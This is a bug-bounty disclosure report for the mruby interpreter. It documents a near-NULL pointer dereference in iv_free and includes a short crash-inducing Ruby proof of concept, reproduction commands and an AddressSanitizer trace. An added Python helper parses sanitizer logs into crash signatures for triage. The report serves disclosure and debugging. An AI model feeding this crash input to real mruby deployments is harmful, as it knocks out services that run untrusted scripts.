huntr report 795DCBD9-1695-44BB-8C59-AD327C97C976 by octaviogalland
Jan 17, 2022 - 1:59 p.m.

in mruby/mruby

www.huntr.dev

5.5 Medium (CVSS3)
Attack Vector: LOCAL
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

4.3 Medium (CVSS2)
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: PARTIAL
AV:N/AC:M/Au:N/C:N/I:N/A:P

EPSS: 0.001 Low (percentile 22.0%)

Description

There is a NULL pointer dereference in iv_free (src/variable.c:232:20): the iv_tbl pointer handed to iv_free is invalid, so freeing an object's instance variables while mrb_close tears down the heap crashes the interpreter. Note that the sanitizer trace below reports the accesses at 0x1 and 0x9 (in the zero page) rather than at exactly 0, i.e. a near-NULL pointer plus a field offset. This bug was found on the latest mruby commit at the time (hash 31fa3304049fc406a201a72293cce140f0557dca) on Ubuntu 20.04 for x86_64/amd64.

Proof of Concept

6.times{3.times{%]#{{}until-break
b={}
[**0,m:0]
s=0}]}}

Steps to reproduce

1- Clone the repo and build with ASan: MRUBY_CONFIG=build_config/clang-asan.rb rake

2- Use the resulting mruby binary to execute the PoC:

$ echo -ne "Ni50aW1lc3szLnRpbWVzeyVdI3t7fXVudGlsLWJyZWFrCmI9e30KWyoqMCxtOjBdCnM9MH1dfX0=" | base64 -d > poc
$ build/host/bin/mruby ./poc
/home/faraday/mruby/src/variable.c:232:20: runtime error: member access within misaligned address 0x000000000001 for type 'iv_tbl' (aka 'struct iv_tbl'), which requires 8 byte alignment
0x000000000001: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/variable.c:232:20 in 
/home/faraday/mruby/src/variable.c:232:20: runtime error: load of misaligned address 0x000000000009 for type 'mrb_value *' (aka 'struct mrb_value *'), which requires 8 byte alignment
0x000000000009: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/variable.c:232:20 in 
AddressSanitizer:DEADLYSIGNAL
=================================================================
==10997==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000009 (pc 0x000000802ae6 bp 0x7ffc41eb8600 sp 0x7ffc41eb85d0 T0)
==10997==The signal is caused by a READ memory access.
==10997==Hint: address points to the zero page.
    #0 0x802ae6 in iv_free /home/faraday/mruby/src/variable.c:232:20
    #1 0x802f59 in mrb_gc_free_iv /home/faraday/mruby/src/variable.c:278:5
    #2 0x6146ae in obj_free /home/faraday/mruby/src/gc.c:856:5
    #3 0x607e21 in free_heap /home/faraday/mruby/src/gc.c:433:9
    #4 0x60793c in mrb_gc_destroy /home/faraday/mruby/src/gc.c:442:3
    #5 0x665405 in mrb_close /home/faraday/mruby/src/state.c:195:3
    #6 0x4ca4ee in cleanup /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:262:3
    #7 0x4c662a in main /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:368:3
    #8 0x7f36f27bd0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #9 0x41c84d in _start (/home/faraday/mruby/build/host/bin/mruby+0x41c84d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/variable.c:232:20 in iv_free
==10997==ABORTING

Running the same script with a release build (without ASan) results in a segfault due to the invalid dereference.
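As an added triage helper (not part of the huntr report or of mruby's own code), the script below parses the clang ASan/UBSan text quoted above into a structured report and a stable crash signature, the kind of bucketing you need when a fuzzing run produces many mruby PoCs. It also classifies the faulting address as exact NULL versus a small non-zero zero-page pointer, which is the distinction that matters for this report: UBSan shows the iv_tbl pointer itself is 0x1 and the load at 0x9 is a pointer field read through it. The sanitizer log embedded in it is the report's output reproduced as constructed sample input; the path markers (/src/, /mrbgems/, /include/) used to recognise in-project frames are an assumption about the checkout layout.

```python
"""Crash-triage helper for clang ASan/UBSan output (added example; not part of
the huntr report or of mruby). Parses a sanitizer log into a structured report
and a stable signature for bucketing many fuzzer-found mruby PoCs.
Assumption: in-project frames are recognised by the path markers below."""
import re

# Constructed sample input: the sanitizer output quoted in the report above.
SAMPLE_LOG = """\
/home/faraday/mruby/src/variable.c:232:20: runtime error: member access within misaligned address 0x000000000001 for type 'iv_tbl' (aka 'struct iv_tbl'), which requires 8 byte alignment
0x000000000001: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/variable.c:232:20 in
/home/faraday/mruby/src/variable.c:232:20: runtime error: load of misaligned address 0x000000000009 for type 'mrb_value *' (aka 'struct mrb_value *'), which requires 8 byte alignment
0x000000000009: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/variable.c:232:20 in
AddressSanitizer:DEADLYSIGNAL
==10997==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000009 (pc 0x000000802ae6 bp 0x7ffc41eb8600 sp 0x7ffc41eb85d0 T0)
==10997==The signal is caused by a READ memory access.
==10997==Hint: address points to the zero page.
    #0 0x802ae6 in iv_free /home/faraday/mruby/src/variable.c:232:20
    #1 0x802f59 in mrb_gc_free_iv /home/faraday/mruby/src/variable.c:278:5
    #2 0x6146ae in obj_free /home/faraday/mruby/src/gc.c:856:5
    #3 0x607e21 in free_heap /home/faraday/mruby/src/gc.c:433:9
    #4 0x60793c in mrb_gc_destroy /home/faraday/mruby/src/gc.c:442:3
    #5 0x665405 in mrb_close /home/faraday/mruby/src/state.c:195:3
    #6 0x4ca4ee in cleanup /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:262:3
    #7 0x4c662a in main /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:368:3
    #8 0x7f36f27bd0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #9 0x41c84d in _start (/home/faraday/mruby/build/host/bin/mruby+0x41c84d)

SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/variable.c:232:20 in iv_free
==10997==ABORTING
"""

UBSAN_RE = re.compile(r"^(?P<loc>\S+:\d+:\d+): runtime error: (?P<msg>.+)$", re.M)
ASAN_RE = re.compile(
    r"ERROR: AddressSanitizer: (?P<kind>[\w-]+) on (?:unknown )?address (?P<addr>0x[0-9a-fA-F]+)"
)
FRAME_RE = re.compile(r"^\s*#\d+ 0x[0-9a-fA-F]+ in (?P<func>\S+) (?P<loc>\S+)", re.M)
ADDR_RE = re.compile(r"address (0x[0-9a-fA-F]+)")
PROJECT_MARKERS = ("/src/", "/mrbgems/", "/include/")  # assumed mruby checkout layout


def classify_address(addr):
    """Exactly 0 is a true NULL dereference. A small non-zero address (0x1 and
    0x9 here) is a near-NULL or tag-like pointer plus a field offset, which
    usually points at corrupted object state rather than a missing NULL check."""
    if addr == 0:
        return "null"
    if addr < 0x1000:
        return "zero-page"
    return "wild"


def normalize_location(loc):
    """Drop the checkout-specific prefix so signatures compare across hosts.
    Returns None for frames outside the project (libc, _start, ...)."""
    cuts = [loc.find(m) for m in PROJECT_MARKERS if m in loc]
    return loc[min(cuts) + 1:] if cuts else None


def parse_sanitizer_log(text):
    asan = ASAN_RE.search(text)
    fault_addr = int(asan["addr"], 16) if asan else None
    ubsan = [(normalize_location(m["loc"]) or m["loc"], m["msg"]) for m in UBSAN_RE.finditer(text)]
    frames = [(m["func"], m["loc"]) for m in FRAME_RE.finditer(text)]
    project_frames = [(f, normalize_location(l)) for f, l in frames if normalize_location(l)]
    return {
        "asan_kind": asan["kind"] if asan else None,
        "fault_addr": fault_addr,
        "addr_class": classify_address(fault_addr) if asan else None,
        # UBSan fires first: it reports the iv_tbl pointer as 0x1 and then a load
        # at 0x9, i.e. an 8-byte-offset pointer field read through that bad pointer.
        "ubsan": ubsan,
        "ubsan_addresses": [int(a, 16) for _, msg in ubsan for a in ADDR_RE.findall(msg)],
        "frames": frames,
        "project_frames": project_frames,
    }


def crash_signature(report, depth=3):
    """Bucket key: sanitizer kind, address class, top in-project frames."""
    top = "|".join(f"{f}@{l}" for f, l in report["project_frames"][:depth])
    return f"{report['asan_kind']}|{report['addr_class']}|{top}"


if __name__ == "__main__":
    rep = parse_sanitizer_log(SAMPLE_LOG)
    print(crash_signature(rep))
    print("UBSan addresses:", [hex(a) for a in rep["ubsan_addresses"]])
```

Feed it the stderr of each PoC run under the ASan build; PoCs that share a signature almost always share a root cause, and an addr_class of "zero-page" rather than "null" is a hint to look for corrupted object state (here, whatever wrote 0x1 into the object's iv pointer) rather than for a missing NULL check in iv_free.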

Acknowledgements

This bug was found by Octavio Gianatiempo ([email protected]) and Octavio Galland ([email protected]) from Faraday Research Team.
